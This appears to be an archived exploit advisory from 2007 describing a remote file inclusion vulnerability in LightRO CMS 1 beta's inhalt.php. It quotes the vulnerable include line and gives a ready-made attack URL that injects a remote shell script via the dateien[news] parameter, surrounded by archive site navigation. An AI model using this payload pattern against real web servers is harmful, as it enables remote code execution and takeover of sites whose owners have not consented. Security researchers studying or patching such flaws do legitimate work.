lightro-rfi.txt

lightro-rfi.txt: Posted Feb 8, 2007; Authored by ajann; LightRO CMS version 1 beta suffers from a remote file inclusion vulnerability in inhalt.php.; tags | exploit, remote, php, code execution, file inclusion; SHA-256 | 270f4e58bdac1ef845bc43b4c1b29b2a53d69063255d592528bd31d8061aac75; Download | Favorite | View

lightro-rfi.txt

*******************************************************************************
# Title   :  LightRO CMS 1 beta(inhalt.php) Remote File Include Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://www.lightro.de.tc/
# $$      :  Free

*******************************************************************************
[[ERROR]]]
..
...
.....
<?
include $dateien['news'];
?>
..
...
.....

[[ERROR]]]


[[RFI]]]

http://[target]/[path]/inhalt.php?dateien[news]=[SHELL]

Example:

//inhalt.php?dateien[news]=http://[target]/[path]/shell.x

[[/RFI]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

Top Authors In Last 30 Days

Red Hat 228 files
Ubuntu 55 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Google Security Research 6 files
Apple 6 files
Milad Karimi 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,333)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,578)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,460)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

lightro-rfi.txt

lightro-rfi.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

lightro-rfi.txt

Share This

lightro-rfi.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems